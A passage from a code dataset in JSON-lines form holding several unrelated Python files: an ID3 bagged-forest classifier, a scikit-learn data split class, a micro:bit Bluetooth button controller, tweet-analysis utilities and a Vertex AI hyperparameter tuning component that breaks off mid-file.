  dataSetPath = path\n\n    trainLabelsDictionary, trainFeaturesDictionary = readTrainFile()\n    testLabelsDictionary, testFeaturesDictionary = readTestFile()\n    print(testLabelsDictionary)\n\n    features = []\n    for featureVector in trainFeaturesDictionary.values():\n        features += list(featureVector.keys())\n    for featureVector in testFeaturesDictionary.values():\n        features += list(featureVector.keys())\n    numFeatures = max(features)\n\n    print('\\n---------------THESE ARE THE STATISTICS FOR THE DATA SETS---------------')\n\n    print('The size of the training set is %d' % (len(trainLabelsDictionary)))\n    print('The size of the 
test set is %d' % (len(testLabelsDictionary)))\n\n print('\\n---------------THESE ARE THE RESULTS FOR THE BAGGED FORESTS---------------')\n\n features = [x for x in range(1,numFeatures+1)]\n trees = []\n for i in range(0,100):\n initialDataSet = np.random.choice(len(trainLabelsDictionary), len(trainLabelsDictionary), replace=True)\n tree = id3Algorithm(initialDataSet, features, None, 0, 3)\n trees.append(tree)\n print('Tree number %d completed' % (i+1))\n\n trainAccuracy, transformedTrainData = evaluate_batch(trainLabelsDictionary, trainFeaturesDictionary, trees)\n testAccuracy, transformedTestData = evaluate_batch(testLabelsDictionary, testFeaturesDictionary, trees)\n print('Train Accuracy = %f Percent\\n' % (trainAccuracy))\n print('Test Accuracy = %f Percent\\n' % (testAccuracy))\n with open('data/trees/train.features.data', 'w') as f:\n json.dump(transformedTrainData, f)\n with open('data/trees/train.labels.data', 'w') as f:\n json.dump(trainLabelsDictionary, f)\n with open('data/trees/test.features.data', 'w') as f:\n json.dump(transformedTestData, f)\n with open('data/trees/test.labels.data', 'w') as f:\n json.dump(testLabelsDictionary, f)\n\n for i in range(0,5):\n validateLabelsDictionary, validateFeaturesDictionary = readValidateTrainFiles(i)\n validateTestLabelsDictionary, validateTestFeaturesDictionary = readValidateTestFile(i)\n validateAccuracy, transformedValidateData = evaluate_batch(validateLabelsDictionary, validateFeaturesDictionary, trees)\n validateTestAccuracy, transformedValidateTestData = evaluate_batch(validateTestLabelsDictionary, validateTestFeaturesDictionary, trees)\n with open('data/trees/split0%d.features.data' % i, 'w') as f:\n json.dump(transformedValidateData, f)\n with open('data/trees/split0%d.labels.data' % i, 'w') as f:\n json.dump(validateLabelsDictionary, f)\n with open('data/trees/split0%d.test.features.data' % i, 'w') as f:\n json.dump(transformedValidateTestData, f)\n with open('data/trees/split0%d.test.labels.data' % i, 'w') as f:\n json.dump(validateTestLabelsDictionary, f)\n\n# The following function reads all but one cross-validation data files\ndef readValidateTrainFiles(heldOutK):\n global dataSetPath\n global validateSetPattern\n trainLines = []\n for i in range(0,5):\n if(i != heldOutK):\n with open((dataSetPath + validateSetPattern % (i))) as trainFile:\n trainLines = trainLines + trainFile.readlines()\n return parseLines(trainLines)\n\n# The following function reads the validation file for cross-validations\ndef readValidateTestFile(fileNumber):\n global dataSetPath\n global validateSetPattern\n validateData = {}\n with open((dataSetPath + validateSetPattern % (fileNumber))) as validateFile:\n validateLines = validateFile.readlines()\n return parseLines(validateLines)\n\n# The following three functions read the training, development, and test data sets\ndef readTrainFile():\n global dataSetPath\n global trainSetName\n with open(dataSetPath + trainSetName) as trainFile:\n trainLines = trainFile.readlines()\n return parseLines(trainLines)\n\ndef readTestFile():\n global dataSetPath\n global testSetName\n with open(dataSetPath + testSetName) as trainFile:\n trainLines = trainFile.readlines()\n return parseLines(trainLines)\n\n# The following functions takes lines from a data file and parses them into labels, feature attributes and their values\n# It returns two dictionaries with common keys, one contains the feature vector, and one contains the label\ndef parseLines(trainLines):\n labelsDictionary = {}\n featuresDictionary = {}\n 
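# each line is expected in libSVM-style form \"<label> <index>:<value> ...\",\n    # e.g. \"1 3:1 11:2\"; a leading '1' maps to label +1, anything else to -1\n    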
trainDataList = [line.strip() for line in trainLines]\n for dataIndex in range(0,len(trainDataList)):\n data = trainDataList[dataIndex]\n dataParts = data.split(' ')\n label = -1\n if(dataParts[0] == '1'):\n label = 1\n if(len(dataParts) > 1):\n featureVector = {int(attribute.strip().split(':')[0]): int(attribute.strip().split(':')[1]) for attribute in dataParts[1:]}\n else:\n featureVector = {}\n labelsDictionary[dataIndex] = label\n featuresDictionary[dataIndex] = featureVector\n return labelsDictionary, featuresDictionary\n\n# This function evaluates a batch of trees against a data set by majority voting among the trees\ndef evaluate_batch(labelsDataSet, featuresDataSet, trees):\n totalSamples = len(labelsDataSet)\n correctSamples = 0\n transformedFeaturesSet = {}\n for example in labelsDataSet:\n transformedFeature = {}\n vote_tally = 0\n index = 1\n for tree in trees:\n currentTree = tree\n while(not currentTree.prediction):\n currentFeature = currentTree.feature\n sampleFeatureValue = 0\n if currentFeature in featuresDataSet[example]:\n sampleFeatureValue = 1\n for childTree in currentTree.children:\n if(childTree.featureValue == sampleFeatureValue):\n currentTree = childTree\n break\n vote_tally += currentTree.prediction\n transformedFeature[index] = currentTree.prediction\n index += 1\n transformedFeature[0] = 1\n transformedFeaturesSet[example] = transformedFeature\n predictionValue = 1\n if vote_tally < 0:\n predictionValue = -1\n if labelsDataSet[example] == predictionValue:\n correctSamples += 1\n return (correctSamples/totalSamples)*100, transformedFeaturesSet\n\n# This method returns a decision tree based upon the data set with given depth\ndef id3Algorithm(dataSet, remainingFeatures, featureValue, level, maxDepth):\n global trainFeaturesDictionary\n\n uniformLabels, label = allUniformLabels(dataSet)\n if(uniformLabels):\n newTree = DecisionTree(label, None, featureValue, level)\n return newTree\n elif(len(remainingFeatures) == 0):\n majorityLabel = findMajorityLabel(dataSet)\n newTree = DecisionTree(majorityLabel, None, featureValue, level)\n return newTree\n elif(level >= maxDepth):\n majorityLabel = findMajorityLabel(dataSet)\n newTree = DecisionTree(majorityLabel, None, featureValue, level)\n return newTree\n else:\n bestFeature = findBestRemainingFeature(dataSet, remainingFeatures)\n leftoverFeatures = [x for x in remainingFeatures]\n leftoverFeatures.remove(bestFeature)\n \n newTree = DecisionTree(None, bestFeature, featureValue, level)\n\n positiveDataSet = []\n negativeDataSet = []\n for name in dataSet:\n if(bestFeature in trainFeaturesDictionary[name]):\n positiveDataSet.append(name)\n else:\n negativeDataSet.append(name)\n \n if(len(positiveDataSet) == 0):\n commonLabel = findMajorityLabel(dataSet)\n positiveTree = DecisionTree(commonLabel, None, 1, level+1)\n else:\n positiveTree = id3Algorithm(positiveDataSet, leftoverFeatures, 1, level+1, maxDepth)\n \n if(len(negativeDataSet) == 0):\n commonLabel = findMajorityLabel(dataSet)\n negativeTree = DecisionTree(commonLabel, None, 0, level+1)\n else:\n negativeTree = id3Algorithm(negativeDataSet, leftoverFeatures, 0, level+1, maxDepth)\n \n positiveTree.parent = newTree\n negativeTree.parent = newTree\n newTree.children = [positiveTree, negativeTree]\n return newTree\n\n# This method checks for data sets with uniform labeling\ndef allUniformLabels(dataSet):\n global trainLabelsDictionary\n\n label = trainLabelsDictionary[dataSet[0]]\n for name in dataSet:\n if(trainLabelsDictionary[name] != label):\n return False, 
label\n return True, label\n\n# This data set finds the majority label of a data set\ndef findMajorityLabel(dataSet):\n numPositiveSamples = len(getPositiveSamples(dataSet))\n numNegativeSamples = len(getNegativeSamples(dataSet))\n if(numPositiveSamples >= numNegativeSamples):\n return 1\n else:\n return -1\n\n# This method finds the best remaining feature based upon information gain\ndef findBestRemainingFeature(dataSet, features):\n if(len(features) == 1):\n return features[0]\n bestFeature = -1\n bestFeatureIG = -1000.0\n numTotalPositiveLabelSamples = len(getPositiveSamples(dataSet))\n numTotalNegativeLabelSamples = len(getNegativeSamples(dataSet))\n totalEntropy = entropy(numTotalPositiveLabelSamples, numTotalNegativeLabelSamples)\n for feature in features:\n featureIG = informationGain(dataSet,feature,totalEntropy)\n if(featureIG > bestFeatureIG):\n bestFeature = feature\n bestFeatureIG = featureIG\n return bestFeature\n\n# This method calculates information gain of a feature over a data set\ndef informationGain(dataSet, feature, totalEntropy):\n global trainFeaturesDictionary\n\n positiveFeatureDataSet = []\n negativeFeatureDataSet = []\n for example in dataSet:\n if feature in trainFeaturesDictionary[example]:\n positiveFeatureDataSet.append(example)\n else:\n negativeFeatureDataSet.append(example)\n \n numTotalSamples = len(dataSet)\n numPositiveFeatureSamples = len(positiveFeatureDataSet)\n numNegativeFeatureSamples = len(negativeFeatureDataSet)\n \n positiveFeatureEntropy = 0\n if(numPositiveFeatureSamples > 0):\n numPositiveFeaturePositiveLabelSamples = len(getPositiveSamples(positiveFeatureDataSet))\n numPositiveFeatureNegativeLabelSamples = len(getNegativeSamples(positiveFeatureDataSet))\n positiveFeatureEntropy = entropy(numPositiveFeaturePositiveLabelSamples, numPositiveFeatureNegativeLabelSamples)\n\n negativeFeatureEntropy = 0\n if(numNegativeFeatureSamples > 0):\n numNegativeFeaturePositiveLabelSamples = len(getPositiveSamples(negativeFeatureDataSet))\n numNegativeFeatureNegativeLabelSamples = len(getNegativeSamples(negativeFeatureDataSet))\n negativeFeatureEntropy = entropy(numNegativeFeaturePositiveLabelSamples, numNegativeFeatureNegativeLabelSamples)\n\n gain = totalEntropy - ((numPositiveFeatureSamples/numTotalSamples)*positiveFeatureEntropy \n + (numNegativeFeatureSamples/numTotalSamples)*negativeFeatureEntropy)\n \n return gain\n\n# This method calculates entropy for a data set\ndef entropy(numPositives, numNegatives):\n total = numPositives + numNegatives\n positiveFraction = numPositives/total\n negativeFraction = numNegatives/total\n if(positiveFraction == negativeFraction):\n return 1\n if(positiveFraction == 0 or negativeFraction == 0):\n return 0\n else: \n positiveLog = positiveFraction*math.log(positiveFraction, 2)\n negativeLog = negativeFraction*math.log(negativeFraction, 2)\n totalEntropy = -positiveLog - negativeLog\n return totalEntropy\n\n# This method returns all positive samples of a data set\ndef getPositiveSamples(dataSet):\n global trainLabelsDictionary\n\n positiveSamples = []\n for example in dataSet:\n if(trainLabelsDictionary[example] == 1):\n positiveSamples.append(example)\n return positiveSamples\n\n# This method returns all negative samples of a data set\ndef getNegativeSamples(dataSet):\n global trainLabelsDictionary\n\n negativeSamples = []\n for example in dataSet:\n if(trainLabelsDictionary[example] == -1):\n negativeSamples.append(example)\n return negativeSamples\n\n# This method prints a decision tree object\ndef 
printDecisionTree(tree):\n print(tree)\n for child in tree.children:\n printDecisionTree(child)\n\n# This class represents a decision tree\nclass DecisionTree:\n prediction = None\n feature = None\n featureValue = None\n children = []\n parent = None\n level = None\n\n def __init__(self, prediction, feature, featureValue, level):\n self.prediction = prediction\n self.feature = feature\n self.featureValue = featureValue\n self.level = level\n\n def __str__(self):\n printString = ''\n if(self.prediction):\n printString += ('Prediction: %d\\n' % (self.prediction))\n if(self.feature):\n printString += ('Feature: %d\\n' % (self.feature))\n if(self.featureValue):\n printString += ('ParentFeatureValue: %d\\n' % (self.featureValue))\n if(self.level):\n printString += ('Level: %d\\n' % (self.level))\n printString += '\\n'\n return printString\n\n\n\nif __name__ == '__main__':\n main(sys.argv[1])","sub_path":"to_turn_in/Ryan/bagged_forests.py","file_name":"bagged_forests.py","file_ext":"py","file_size_in_byte":14250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"328730401","text":"import os\nimport pandas as pd\nimport collections\n\nimport sklearn.model_selection\n\nimport config\n\n\nclass Split:\n\n def __init__(self, arguments: collections.namedtuple('SplittingArguments',\n ['train_size', 'random_state', 'target', 'strata'])):\n \"\"\"\n\n :param arguments: A collection of named arguments, and their values, for\n the sklearn.model_selection.train_test_split() function\n \"\"\"\n\n self.arguments = arguments\n\n self.configurations = config.Config()\n self.path = os.path.join(self.configurations.warehouse, 'data', 'modelling', 'splits', 'scikit')\n\n def __write(self, training: pd.DataFrame, testing: pd.DataFrame):\n \"\"\"\n\n :param training:\n :param testing:\n :return:\n \"\"\"\n\n training.to_csv(path_or_buf=os.path.join(self.path, 'training.csv'),\n header=True, index=False, encoding='UTF-8')\n testing.to_csv(path_or_buf=os.path.join(self.path, 'testing.csv'),\n header=True, index=False, encoding='UTF-8')\n\n def exc(self, data: pd.DataFrame) -> (pd.DataFrame, pd.DataFrame):\n \"\"\"\n\n :param data:\n :return:\n \"\"\"\n\n x_train, x_test, y_train, y_test = sklearn.model_selection.train_test_split(\n data.drop(columns=self.arguments.target),\n data[self.arguments.target],\n train_size=self.arguments.train_size,\n random_state=self.arguments.random_state,\n stratify=data[self.arguments.strata])\n\n training = pd.concat((x_train.reset_index(drop=True), y_train.reset_index(drop=True)), axis=1,\n ignore_index=False)\n testing = pd.concat((x_test.reset_index(drop=True), y_test.reset_index(drop=True)), axis=1,\n ignore_index=False)\n \n self.__write(training=training, testing=testing)\n\n return training, testing\n","sub_path":"risk/functions/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"270362585","text":"\"\"\"\nThis is a simple example of how to read data from a micro:bit.\n\nYou will need the Bluetooth services of the micro:bit exposed.\n\nThis code was developed using the 'Bluetooth Most Services, No Security'\nmicro:bit hex file from:\nhttp://bluetooth-mdw.blogspot.co.uk/p/bbc-microbit.html\n\n\"\"\"\nimport argparse\nimport dbus\nfrom time import sleep\n\nfrom gpiozero import LED\nfrom gpiozero import Buzzer\n\nfrom bluezero import constants\nfrom bluezero import tools\nfrom bluezero import 
adapter\r\n\r\n# constants\r\nled1 = LED(22)\r\nled2 = LED(23)\r\nled3 = LED(24)\r\nbuzz = Buzzer(5)\r\nBEEP_TIME = 0.25\r\n\r\n\r\nclass microbit:\r\n    \"\"\"\r\n    Class to introspect Bluez to find the paths for required UUIDs\r\n    \"\"\"\r\n    def __init__(self, address):\r\n        self.bus = dbus.SystemBus()\r\n        self.address = address\r\n        # Device Information\r\n        self.device_path = tools.get_dbus_path(constants.DEVICE_INTERFACE,\r\n                                               'Address',\r\n                                               self.address)[0]\r\n        self.remote_device_obj = self.bus.get_object(\r\n            constants.BLUEZ_SERVICE_NAME,\r\n            self.device_path)\r\n        self.remote_device_methods = dbus.Interface(\r\n            self.remote_device_obj,\r\n            constants.DEVICE_INTERFACE)\r\n        self.remote_device_props = dbus.Interface(self.remote_device_obj,\r\n                                                  dbus.PROPERTIES_IFACE)\r\n        # Button Service\r\n        self.btn_srv_uuid = 'E95D9882-251D-470A-A062-FA1922DFA9A8'\r\n        self.btn_srv_path = None\r\n        # Button A\r\n        self.btn_a_chr_uuid = 'E95DDA90-251D-470A-A062-FA1922DFA9A8'\r\n        self.btn_a_chr_path = None\r\n        # Button B\r\n        self.btn_b_chr_uuid = 'E95DDA91-251D-470A-A062-FA1922DFA9A8'\r\n        self.btn_b_chr_path = None\r\n\r\n    def connect(self):\r\n        self.remote_device_methods.Connect()\r\n        while not self.remote_device_props.Get(\r\n                constants.DEVICE_INTERFACE,\r\n                'ServicesResolved'):\r\n            sleep(0.25)\r\n        self._update_dbus_paths()\r\n\r\n    def _update_dbus_paths(self):\r\n        self.btn_srv_path = tools.uuid_dbus_path(constants.GATT_SERVICE_IFACE,\r\n                                                 self.btn_srv_uuid)[0]\r\n        # Button A\r\n        self.btn_a_chr_path = tools.uuid_dbus_path(constants.GATT_CHRC_IFACE,\r\n                                                   self.btn_a_chr_uuid)[0]\r\n        # Button B\r\n        self.btn_b_chr_path = tools.uuid_dbus_path(constants.GATT_CHRC_IFACE,\r\n                                                   self.btn_b_chr_uuid)[0]\r\n\r\n    @property\r\n    def connected(self):\r\n        \"\"\"Indicate whether the remote device is currently connected.\"\"\"\r\n        return self.remote_device_props.Get(\r\n            constants.DEVICE_INTERFACE, 'Connected')\r\n\r\n    def disconnect(self):\r\n        self.remote_device_methods.Disconnect()\r\n\r\n    def read_button_a(self):\r\n        \"\"\"\r\n        Helper function to read the state of button A on a micro:bit\r\n        :return: integer representing button value\r\n        \"\"\"\r\n        return self.read_button(self.btn_a_chr_path)\r\n\r\n    def read_button_b(self):\r\n        \"\"\"\r\n        Helper function to read the state of button B on a micro:bit\r\n        :return: integer representing button value\r\n        \"\"\"\r\n        return self.read_button(self.btn_b_chr_path)\r\n\r\n    def read_button(self, btn_path):\r\n        \"\"\"\r\n        Read the button characteristic on the micro:bit and return value\r\n        :param btn_path: The Bluez path to the button characteristic\r\n        :return: integer representing button value\r\n        \"\"\"\r\n\r\n        # Get characteristic interface for data\r\n        btn_obj = self.bus.get_object(constants.BLUEZ_SERVICE_NAME,\r\n                                      btn_path)\r\n        btn_iface = dbus.Interface(btn_obj, constants.GATT_CHRC_IFACE)\r\n\r\n        # Read button value\r\n        btn_val = btn_iface.ReadValue(dbus.Array())\r\n\r\n        answer = int.from_bytes(btn_val, byteorder='little', signed=False)\r\n        return answer\r\n\r\n\r\ndef central(address):\r\n    dongle = adapter.Adapter(adapter.list_adapters()[0])\r\n    if not dongle.powered:\r\n        dongle.powered = True\r\n    # Find nearby devices\r\n    dongle.nearby_discovery()\r\n\r\n    ubit = microbit(address)\r\n    sense_buttons = True\r\n\r\n    ubit.connect()\r\n\r\n    led2.on()\r\n    buzz.on()\r\n    sleep(BEEP_TIME)\r\n    buzz.off()\r\n\r\n    while sense_buttons:\r\n        btn_a = ubit.read_button_a()\r\n        btn_b = ubit.read_button_b()\r\n        # print('Button states: a={} b={}'.format(btn_a, btn_b))\r\n        if btn_a > 0 and btn_b < 1:\r\n            print('Button A')\r\n            led1.on()\r\n            led3.off()\r\n        elif btn_a < 1 and btn_b > 0:\r\n            print('Button B')\r\n            led1.off()\r\n            led3.on()\r\n        elif btn_a > 0 and btn_b > 0:\r\n            sense_buttons = False\r\n            
led1.on()\r\n            led3.on()\r\n            buzz.on()\r\n            sleep(BEEP_TIME)\r\n            buzz.off()\r\n            print('Bye bye!!!')\r\n        elif btn_a < 1 and btn_b < 1:\r\n            led1.off()\r\n            led3.off()\r\n        if not ubit.connected:\r\n            sense_buttons = False\r\n            led1.on()\r\n            led2.on()\r\n            led3.on()\r\n            buzz.on()\r\n            sleep(BEEP_TIME)\r\n            buzz.off()\r\n\r\n        sleep(0.02)\r\n\r\n    # Disconnect device\r\n    ubit.disconnect()\r\n\r\n    # Read the connected status property\r\n    led1.off()\r\n    led2.off()\r\n    led3.off()\r\n    buzz.off()\r\n\r\n\r\nif __name__ == '__main__':\r\n    parser = argparse.ArgumentParser(\r\n        description='Use micro:bit as remote for Ryanteck TrafficHAT.')\r\n    parser.add_argument('address',\r\n                        help='the address of the micro:bit of interest')\r\n\r\n    args = parser.parse_args()\r\n    central(str(args.address))\r\n","sub_path":"smart-projects/python-bluezero/examples/level10/microbit_button.py","file_name":"microbit_button.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"517919634","text":"from datetime import datetime\nimport operator\nimport rates\n\n\ndef is_only_link(string):\n    st = string.split(' ')\n    return len(st) == 1 and 'http' in string\n\n\ndef clean_words(word):\n    return remove_spaces([''.join(c for c in w if c.isalpha() or c == '') for w in word.split(' ')])\n\n\ndef remove_spaces(word):\n    tmp = []\n    for i in word:\n        if i != '':\n            tmp.append(i)\n    return tmp\n\n\ndef datetime_to_string(date):\n    dt = datetime.fromisoformat(date)\n    return dt.strftime('%H:%M')\n\n\ndef datetime_to_date(date):\n    dt = datetime.fromisoformat(date)\n    return dt.strftime('%d/%m/%Y %H:%M')\n\n\ndef gen_hours_data(data):\n    cr_at = [x['created_at'] for x in data['tweets']]\n    times = list(map(datetime_to_string, cr_at))\n\n    hours = {}\n    for i in times:\n        try:\n            hours[i[0:2]] += 1\n        except:\n            hours[i[0:2]] = 1\n\n    return hours\n\n\ndef gen_words_data(data):\n\n    words = [x['words'] for x in data['tweets']]\n    flat_words = []\n    for i in words:\n        if isinstance(i, list):\n            for j in i:\n                flat_words.append(j.lower())\n        else:\n            flat_words.append(i.lower())\n    # filter with a comprehension; calling remove() while iterating skips items\n    flat_words = [w for w in flat_words if len(w) > 3]\n\n    dt = {}\n    for i in flat_words:\n        try:\n            dt[i] += 1\n        except:\n            dt[i] = 1\n    tmp = []\n    for i in dt:\n        if dt[i] < 5:\n            tmp.append(i)\n    for i in tmp:\n        del dt[i]\n\n    return dt\n\n\ndef top_n_values(data, props, n):\n    d = data[props]\n\n    sorted_x = sorted(d.items(), key=operator.itemgetter(1), reverse=True)\n\n    y = {}\n    for i in sorted_x[:n]:\n        y[i[0]] = i[1]\n    return y\n\n\ndef gen_rates(text):\n    res = []\n    for t in text:\n        res.append(rates.rate(t))\n\n    r = {}\n    for i in rates.bases + [None]:\n        try:\n            if i is None:\n                r['indef'] = res.count(i)\n            else:\n                r[i] = res.count(i)\n        except:\n            pass\n    return r\n\n\ndef sumDics(li):\n    x = {}\n\n    for i in li:\n        for j in i:\n            try:\n                x[j] += i[j]\n            except:\n                x[j] = i[j]\n    return x\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"614512193","text":"# pytype: disable=annotation-type-mismatch\nfrom typing import NamedTuple\nfrom google.cloud.aiplatform_v1.types import study\nfrom kfp import components\n\n\ndef hyperparameter_tuning_job_run_op(\n    display_name: str,\n    project: str,\n    base_output_directory: str,\n    worker_pool_specs: list,\n    study_spec_metrics: dict,\n    study_spec_parameters: list,\n    max_trial_count: int,\n    parallel_trial_count: int,\n    max_failed_trial_count: int = 0,\n    location: str = \"us-central1\",\n    study_spec_algorithm: str = 
\"ALGORITHM_UNSPECIFIED\",\n study_spec_measurement_selection_type: str = \"BEST_MEASUREMENT\",\n encryption_spec_key_name: str = None,\n service_account: str = None,\n network: str = None,\n) -> NamedTuple('Outputs', [\n (\"trials\", list),\n]):\n \"\"\"\n Creates a Google Cloud AI Platform HyperparameterTuning Job and waits for it to complete.\n\n For example usage, see https://github.com/kubeflow/pipelines/blob/master/components/google-cloud/google_cloud_pipeline_components/experimental/hyperparameter_tuning_job/hp_tuning_job_sample.ipynb.\n\n For more information on using hyperparameter tuning, please visit:\n https://cloud.google.com/vertex-ai/docs/training/using-hyperparameter-tuning\n\n Args:\n Creates a Google Cloud AI Platform HyperparameterTuning Job and waits for it to complete.\n\n For example usage, see https://github.com/kubeflow/pipelines/blob/master/components/google-cloud/google_cloud_pipeline_components/experimental/hyperparameter_tuning_job/hp_tuning_job_sample.ipynb.\n\n For more information on using hyperparameter tuning, please visit:\n https://cloud.google.com/vertex-ai/docs/training/using-hyperparameter-tuning\n\n Args:\n display_name (str):\n Required. The user-defined name of the HyperparameterTuningJob.\n The name can be up to 128 characters long and can be consist\n of any UTF-8 characters.\n project (str):\n Required. Project to run the HyperparameterTuningJob in.\n base_output_directory (str):\n Required. The Cloud Storage location to store the output of this\n HyperparameterTuningJob. The base_output_directory of each\n child CustomJob backing a Trial is set to a subdirectory\n with name as the trial id under its parent HyperparameterTuningJob's\n base_output_directory. The following Vertex AI environment\n variables will be passed to containers or python modules\n when this field is set:\n For CustomJob backing a Trial of HyperparameterTuningJob:\n * AIP_MODEL_DIR = `\\/\\/model\\/`\n * AIP_CHECKPOINT_DIR = `\\/\\/checkpoints\\/`\n * AIP_TENSORBOARD_LOG_DIR = `\\/\\/logs\\/`\n worker_pool_specs (List[Dict]):\n Required. The spec of the worker pools including machine type and Docker image.\n All worker pools except the first one are optional and can be skipped by providing\n an empty value.\n study_spec_metrics: (Dict[str, str]):\n Required. Dictionary representing metrics to optimize. The dictionary key is the metric_id,\n which is reported by your training job, and the dictionary value is the\n optimization goal of the metric ('minimize' or 'maximize'). example:\n metrics = {'loss': 'minimize', 'accuracy': 'maximize'}\n study_spec_parameters (list[str]):\n Required. List serialized from the parameter dictionary. The dictionary\n represents parameters to optimize. 
The dictionary key is the parameter_id,\n            which is passed into your training job as a command line keyword argument, and the\n            dictionary value is the parameter specification of the metric.\n            from google.cloud.aiplatform import hyperparameter_tuning as hpt\n            from google_cloud_pipeline_components.experimental import hyperparameter_tuning_job\n            parameters = hyperparameter_tuning_job.serialize_parameters({\n                'lr': hpt.DoubleParameterSpec(min=0.001, max=0.1, scale='log'),\n                'units': hpt.IntegerParameterSpec(min=4, max=128, scale='linear'),\n                'activation': hpt.CategoricalParameterSpec(values=['relu', 'selu']),\n                'batch_size': hpt.DiscreteParameterSpec(values=[128, 256], scale='linear')\n            })\n            Supported parameter specifications can be found in aiplatform.hyperparameter_tuning.\n            These parameter specifications are currently supported:\n            DoubleParameterSpec, IntegerParameterSpec, CategoricalParameterSpec, DiscreteParameterSpec\n        max_trial_count (int):\n            Required. The desired total number of Trials.\n        parallel_trial_count (int):\n            Required. The desired number of Trials to run in parallel.\n        max_failed_trial_count (Optional[int]):\n            The number of failed Trials that need to be\n            seen before failing the HyperparameterTuningJob.\n            If set to 0, Vertex AI decides how many Trials\n            must fail before the whole job fails.\n        location (Optional[str]):\n            Location to run the HyperparameterTuningJob in, defaults\n            to \"us-central1\"\n        study_spec_algorithm (Optional[str]):\n            The search algorithm specified for the Study.\n            Accepts one of the following:\n            * `ALGORITHM_UNSPECIFIED` - If you do not specify an algorithm,\n            your job uses the default Vertex AI algorithm. The default\n            algorithm applies Bayesian optimization to arrive at the optimal\n            solution with a more effective search over the parameter space.\n            * 'GRID_SEARCH' - A simple grid search within the feasible space.\n            This option is particularly useful if you want to specify a\n            quantity of trials that is greater than the number of points in\n            the feasible space. In such cases, if you do not specify a grid\n            search, the Vertex AI default algorithm may generate duplicate\n            suggestions. To use grid search, all parameter specs must be\n            of type `IntegerParameterSpec`, `CategoricalParameterSpec`,\n            or `DiscreteParameterSpec`.\n            * 'RANDOM_SEARCH' - A simple random search within the feasible\n            space.\n        study_spec_measurement_selection_type (Optional[str]):\n            This indicates which measurement to use if/when the service\n            automatically selects the final measurement from previously reported\n            intermediate measurements.\n            Accepts: 'BEST_MEASUREMENT', 'LAST_MEASUREMENT'\n            Choose this based on two considerations:\n            A) Do you expect your measurements to monotonically improve? If so,\n            choose 'LAST_MEASUREMENT'. On the other hand, if you're in a situation\n            where your system can \"over-train\" and you expect the performance to\n            get better for a while but then start declining, choose\n            'BEST_MEASUREMENT'. B) Are your measurements significantly noisy\n            and/or irreproducible? If so, 'BEST_MEASUREMENT' will tend to be\n            over-optimistic, and it may be better to choose 'LAST_MEASUREMENT'. If\n            both or neither of (A) and (B) apply, it doesn't matter which\n            selection type is chosen.\n        encryption_spec_key_name (Optional[str]):\n            Customer-managed encryption key options for a\n            HyperparameterTuningJob. 
If this is set, then\n all resources created by the\n HyperparameterTuningJob will be encrypted with\n the provided encryption key.\n\n Has the form:\n ``projects/my-project/locations/my-location/keyRings/my-kr/cryptoKeys/my-key``.\n The key needs to be in the same region as where the compute\n resource is created.\n service_account (Optional[str]):\n Specifies the service account for workload run-as account.\n Users submitting jobs must have act-as permission on this run-as account.\n network (Optional[str]):\n The full name of the Compute Engine network to which the job\n should be peered. For example, projects/12345/global/networks/myVPC.\n Private services access must already be configured for the network.\n If left unspecified, the job is not peered with any network.\n Returns:\n List of HyperparameterTuningJob trials\n \"\"\"\n from google.cloud import aiplatform\n from google.cloud.aiplatform import hyperparameter_tuning as hpt\n from google.cloud.aiplatform_v1.types import study\n from google.cloud.aiplatform.hyperparameter_tuning import _SCALE_TYPE_MAP\n\n # Reverse the _SCALE_TYPE_MAP dict for deserialization\n SCALE_MAP = dict((reversed(item) for item in _SCALE_TYPE_MAP.items()))\n\n PARAMETER_SPEC_MAP = {\n hpt.DoubleParameterSpec._parameter_spec_value_key: hpt.DoubleParameterSpec,\n hpt.IntegerParameterSpec._parameter_spec_value_key: hpt.IntegerParameterSpec,\n hpt.CategoricalParameterSpec._parameter_spec_value_key: hpt.CategoricalParameterSpec,\n hpt.DiscreteParameterSpec._parameter_spec_value_key: hpt.DiscreteParameterSpec,\n }\n\n ALGORITHM_MAP = {\n 'ALGORITHM_UNSPECIFIED': None,\n 'GRID_SEARCH': 'grid',\n 'RANDOM_SEARCH': 'random',\n }\n\n MEASUREMENT_SELECTION_TYPE_MAP = {\n 'BEST_MEASUREMENT': 'best',\n 'LAST_MEASUREMENT': 'last',\n }\n\n aiplatform.init(project=project, location=location,\n staging_bucket=base_output_directory)\n\n # Deserialize the parameters\n parameters_kwargs = {}\n for parameter in study_spec_parameters:\n param = study.StudySpec.ParameterSpec.from_json(parameter)\n parameter_id = param.parameter_id\n param_attrs = {}\n for parameter_spec_value_key, parameter_spec in PARAMETER_SPEC_MAP.items():\n if getattr(param, parameter_spec_value_key):\n attrs = getattr(param, parameter_spec_value_key)\n for parameter, value in parameter_spec._parameter_value_map:\n if hasattr(attrs, value):\n param_attrs[parameter] = getattr(attrs, value)\n # Detect 'scale' in list of arguments to parameter_spec.__init__\n param_spec_code = parameter_spec.__init__.__code__\n if 'scale' in param_spec_code.co_varnames[:param_spec_code.co_argcount]:\n param_attrs['scale'] = SCALE_MAP[param.scale_type]\n parameters_kwargs[parameter_id] = parameter_spec(\n **param_attrs) # pytype: disable=wrong-keyword-args\n break\n\n custom_job_display_name = display_name + '_custom_job'\n\n job = aiplatform.CustomJob(\n display_name=custom_job_display_name,\n staging_bucket=base_output_directory,\n worker_pool_specs=worker_pool_specs,\n )\n\n hp_job = aiplatform.HyperparameterTuningJob(\n display_name=display_name,\n custom_job=job,\n metric_spec=study_spec_metrics,\n parameter_spec={\n **parameters_kwargs\n },\n max_trial_count=max_trial_count,\n parallel_trial_count=parallel_trial_count,\n max_failed_trial_count=max_failed_trial_count,\n search_algorithm=ALGORITHM_MAP[study_spec_algorithm],\n measurement_selection=MEASUREMENT_SELECTION_TYPE_MAP[\n study_spec_measurement_selection_type\n ],\n encryption_spec_key_name=encryption_spec_key_name\n )\n\n hp_job.run(\n 
